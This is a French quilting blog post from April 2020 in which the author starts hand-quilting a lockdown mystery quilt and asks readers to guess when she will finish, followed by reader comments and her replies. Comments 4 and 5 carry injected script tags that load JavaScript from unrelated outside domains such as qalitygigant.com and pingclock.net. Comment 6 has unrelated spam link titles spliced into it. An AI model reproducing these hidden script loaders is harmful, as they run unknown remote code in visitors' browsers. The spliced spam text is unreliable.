• Finalement...

    Bonjour Tout le Monde,
    Ce matin j'ai pris une grande décision,
    Je vais "finitionné" le Mystery quilt,
    D'abord, parce que c'est le moment ou jamais avec le confinement,
    Et je ne veux pas le laisser traîner pendant des années dans un coin!
    J'ai commencé par réfléchir et surtout mesurer mes restes de tissus,
    Il en faut suffisamment pour faire le tour et lui donner un bel aspect,
    Je crois que j'ai trouvé la bonne solution,
    Ne suis-je pas la reine des petits bouts de tissus!!!
    Tout a dégagé sur une des tables de l'atelier,
    Une couche de muslin écru,
    Une couche de molleton,
    Une couche de blocs,
    Et voilà l'travail au bout de nombreux essais pour tout caler comme il faut,
    mystery quilt
    Et maintenant, le quilting,
    Selon ma méthode avec du coton écru,
    Je commence par le milieu et je vais rayonner tout autour,
    Il me semble avoir vu ça dans une vidéo,
    mystery quilt
    Ce mystery quilt du doux nom de California auquel je vais rajouter Confinement
    A débuté le vendredi 20 mars chez Laundry Basket Quilts
    Je vous propose un petit jeu :
    Pour m'encourager et pour vous remercier d'avoir suivi ma progression,
    Pouvez-vous me dire quand pensez-vous que je vais finir cet ouvrage?
    (montage, quilting, bordure tout compris)
    J'offrirai un petit cadeau à celle qui indiquera le nombre de jours exact,
    Il sera envoyé à la gagnante après le confinement,
    Ici la poste fonctionne au ralenti et inutile de faire prendre des risques à nos charmants postiers...
    En attendant, restez à la maison...
    « On continue sur la lancéeBonnes fêtes de Pâques »
    Partager via Gmail Delicious Technorati Yahoo! Google Bookmarks Blogmarks Pin It

    Tags Tags : , ,
  • Commentaires

    1
    Vendredi 10 Avril 2020 à 20:36
    Claire

    excellente idée de commencer le quilting et finition maintenant.Tu vas faire à la main, ou à la machine?Et je n'oserais même pas donner un nombre de jours . . . mais je parie que le confinement sera terminé bien avant ^^

      • Dimanche 12 Avril 2020 à 22:09

        Tu es optimiste, j’espère le finir au plus vite tout en me réservant des pauses quand même 

    2
    Vendredi 10 Avril 2020 à 20:43

    Comme le dit Claire tout dépend si tu quiltes à la machine ou à la main, ce qui est plus long, mais plus beau.

    A bientôt

      • Dimanche 12 Avril 2020 à 22:10

        Je quilte à la main, donc sera plus long...

    3
    Trotti
    Vendredi 10 Avril 2020 à 20:50
    Je dirai 30 jours
      • Dimanche 12 Avril 2020 à 22:11

        On verra, je ne prévois rien d’avance, merci

    4
    Olbia
    Vendredi 10 Avril 2020 à 20:51

    Bon, bon au vue de la vitesse où tu travailles, je dirai 4 jours, en le faisant à la MAC, bien sur.

    Je dis cela au hasard , car  comme je n'ai aucune idée du temps qu'il faut je pense surtout au quilting, qui doit être assez long à réaliser .

    sinon si tu le  fais à la main, alors ce sera un grand Mystère comme son nom,  quand au nombre de jours

    En attendant le voir poser sur la table, il est merveilleux. Bon travail pour la suite

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1586544181522" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>
      • Dimanche 12 Avril 2020 à 22:14

        Quilting à la main, je vais découvrir au jour le jour, mercis

    5
    katia
    Vendredi 10 Avril 2020 à 22:31

    Bonsoir,

    Je suppose que tu vas le quilter à la main puisque tu utilises du coton écru. Je dirai donc 25 jours au total.

    Bonne soirée

    <script src="//pingclock.net/21db1c5c8b372aecca.js" type="text/javascript"></script>
      • Dimanche 12 Avril 2020 à 22:15

        Je suis rapide et efficace mais je pense que ce sera plus long

        merci

    6
    Luce77
    Vendredi 10 Avril 2020 à 23:18

    Oh la la pas facile de répondre à cette question ... ! 

    Je me lance ... Sachant que Stickers sur le thème Smart Emoji | Redbubble:

    - le quilting  n'est pas ta tasse de thé,

    - tu souhaites passer rapidement aux paillettes,

    - que ton paquet est prêt,

    - que tu t'ai entraîné avec le mini donc tu connais ton dessin, 

    - 100 carrés composent le patch et à raison de 9 carrés par jour,

    - + 2 à 3 jours supplémentaires pour quilter les bords + faire et coudre l'étiquette,

    - que le confinement sera propice à une avancée rapide,

    je dirai que ton patch sera fini dans 2 semaines soit le 24 avril pour la saint "Fidèle" Bravo à Inès et Charline !!!! - Le blog de Mortimer

    Bisous Comment ne pas attraper la grippe : les bons gestes | Astuces hebdo  Courage et Images et photos avec tag Smiley (Page 2) - BonnesImages

      • Dimanche 12 Avril 2020 à 22:17

        Alors là tu m’épates! J’adore ton raisonnement, c’est possible à priori, bon, nous verrons...mille mercis 

    7
    Samedi 11 Avril 2020 à 05:56

    Alors pour le jeu ;-) Te connaissant tu fais à la main mais tu couds vite , je dirais que le jour de mes 60ans le 5 mai tu auras fini si si :)   :*)

      • Dimanche 12 Avril 2020 à 22:19

        Oui pourquoi pas, mystère et boule de gomme

    8
    helene
    Samedi 11 Avril 2020 à 07:58

    c'est vraiment un bel ouvrage et qu'il va te falloir terminer pour le 1er Mai 

    bravo à toi

      • Dimanche 12 Avril 2020 à 22:21

        Pour le symbole du porte-bonheur ce serait pas mal, le muguet est ma fleur préférée 

        Merci beaucoup 

    9
    Samedi 11 Avril 2020 à 08:33

    Whaou mais quel travail BRAVO c'est si beau!

    Et pour moi je dirai le 13 mai je jour prévu de la naissance de mon petit fils

    BISES et JOYEUSES Pâques!

     

      • Dimanche 12 Avril 2020 à 22:22

        Oh quel bonheur ce petit qui arrive, 

        Bonnes fêtes pascales 

    10
    Samedi 11 Avril 2020 à 08:42

    Tu as raison ... il ne faut pas laisser traîner un ouvrage ! comme tu le quiltes à la main je dirais une quinzaine de jours mais te connaissant  ça sera sans doute moins !

    je vais me permettre un avis .... je ne quilterais pas avec un coton perlé mais avec du fil à quilter, le même que celui utilisé pour le boutis, je trouve que ça fait plus raffiné ... tu commences par le milieu et bâtis bien pour ne pas avoir de plis ....voilà c'est juste une idée .. tu feras bien comme tu veux et tu auras raison !!!!!

    Bon week-end !! et travaille bien ...

      • Dimanche 12 Avril 2020 à 22:34

        Tes conseils sont précieux mais je suis indisciplinée, j’en ai déjà réalisé un selon les règles avec fil à quilter...

        pour celui-ci j’ai envie d’utiliser ma méthode : je quilte les morceaux que je souhaite mettre en valeur avec un « point sellier » au coton perlé.

        Un autre avantage de ce point c’est la rapidité,

        Merci pour tes encouragements bises

    11
    chantal
    Samedi 11 Avril 2020 à 09:00

    Très bel ouvrage bon courage pour le quilt

    Bon Weekend

      • Dimanche 12 Avril 2020 à 22:35

        Merci beaucoup de me soutenir, belle soirée 

    12
    gisboutis
    Samedi 11 Avril 2020 à 09:01

    Je suis partante pour le 23 avril, vu les aiguilles turbo que tu nous caches la provenance ! lol

    Douces pâques et prends soin de toi

    biz

      • Dimanche 12 Avril 2020 à 22:36

        Pour moi le plus sera le mieux, j’ai d’autres ouvrages qui m’attendent...

        bonnes fêtes pascales, bises

    13
    Anne
    Samedi 11 Avril 2020 à 09:42

    Vu la rapidité de ton avancée, tous tes blocs sont déjà assemblés, ta bordure accrochée, je dirai une semaine. Bravo en tout cas pour ton travail que tu as su mener régulièrement. J'ai sauvegardé tous les blocs mais je ne me suis pas encore lancée. Ca me donne envie. Alors félicitations à toi et BRAVO pour la suite.

      • Dimanche 12 Avril 2020 à 22:38

        Merci pour ce petit mot gentil,

        bises

    14
    Samedi 11 Avril 2020 à 10:03

    Très joli Bizzzzzzzzz

    15
    jacqueline
    Samedi 11 Avril 2020 à 11:43

    Bonjour Pour moi je dirais pour le premier mai. trés joli travail Cordialement

      • Dimanche 12 Avril 2020 à 22:40

        J’aime beaucoup cette date, je me laisse guider par mon aiguille,

        bises

    16
    patricia
    Samedi 11 Avril 2020 à 14:09

    Superbe quel travail.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :